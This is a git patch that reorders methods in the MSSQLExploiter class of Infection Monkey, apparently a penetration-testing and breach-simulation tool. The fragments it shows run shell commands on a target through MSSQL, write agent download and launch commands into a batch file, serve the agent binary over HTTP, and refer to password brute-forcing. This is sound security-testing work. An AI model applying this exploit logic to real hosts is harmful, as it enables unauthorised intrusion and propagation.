From 8d9a2c536f7ac6ebe305e10f95de286a56936d48 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Tue, 14 Jun 2022 14:09:58 -0400 Subject: [PATCH] Agent: Reorder methods in MSSQLExploiter --- monkey/infection_monkey/exploit/mssqlexec.py | 52 ++++++++++---------- 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 111498493..7495b38d7 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -93,42 +93,16 @@ class MSSQLExploiter(HostExploiter): self.exploit_result.propagation_success = True return self.exploit_result - def run_payload_file(self): - self._run_mssql_command(str(self.payload_file_path)) - def create_temp_dir(self): logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}") mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}" self._run_mssql_command(mkdir_command) - def run_monkey(self, monkey_path_on_victim: PureWindowsPath): - self._write_agent_launch_command_to_batch_file(monkey_path_on_victim) - self.run_payload_file() - - def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim): - agent_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) - self._write_command_to_batch_file(agent_launch_command) - def upload_monkey(self, monkey_path_on_victim: PureWindowsPath): self._write_download_command_to_batch_file(monkey_path_on_victim) self.run_payload_file() - def remove_temp_dir(self): - self._run_mssql_command(f"del {self.payload_file_path}") - self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}") - - def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer: - self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( - self.host, str(monkey_path_on_victim), self.agent_repository - ) - return http_thread - - @staticmethod - def _stop_monkey_server(http_thread): - http_thread.stop() - http_thread.join(LONG_REQUEST_TIMEOUT) - def _write_download_command_to_batch_file(self, monkey_path_on_victim: PureWindowsPath): agent_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) @@ -147,6 +121,17 @@ class MSSQLExploiter(HostExploiter): sleep(MSSQLExploiter.QUERY_BUFFER) + def run_payload_file(self): + self._run_mssql_command(str(self.payload_file_path)) + + def run_monkey(self, monkey_path_on_victim: PureWindowsPath): + self._write_agent_launch_command_to_batch_file(monkey_path_on_victim) + self.run_payload_file() + + def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim): + agent_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) + self._write_command_to_batch_file(agent_launch_command) + def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): monkey_args = build_monkey_commandline( self.host, self.current_depth - 1, monkey_path_on_victim @@ -154,6 +139,21 @@ class MSSQLExploiter(HostExploiter): return f"{monkey_path_on_victim} {DROPPER_ARG} {monkey_args}" + def remove_temp_dir(self): + self._run_mssql_command(f"del {self.payload_file_path}") + self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}") + + def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer: + self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( + self.host, str(monkey_path_on_victim), self.agent_repository + ) + return http_thread + + @staticmethod + def _stop_monkey_server(http_thread): + http_thread.stop() + http_thread.join(LONG_REQUEST_TIMEOUT) + def brute_force(self, host, port, users_passwords_pairs_list): """ Starts the brute force connection attempts and if needed then init the payload process.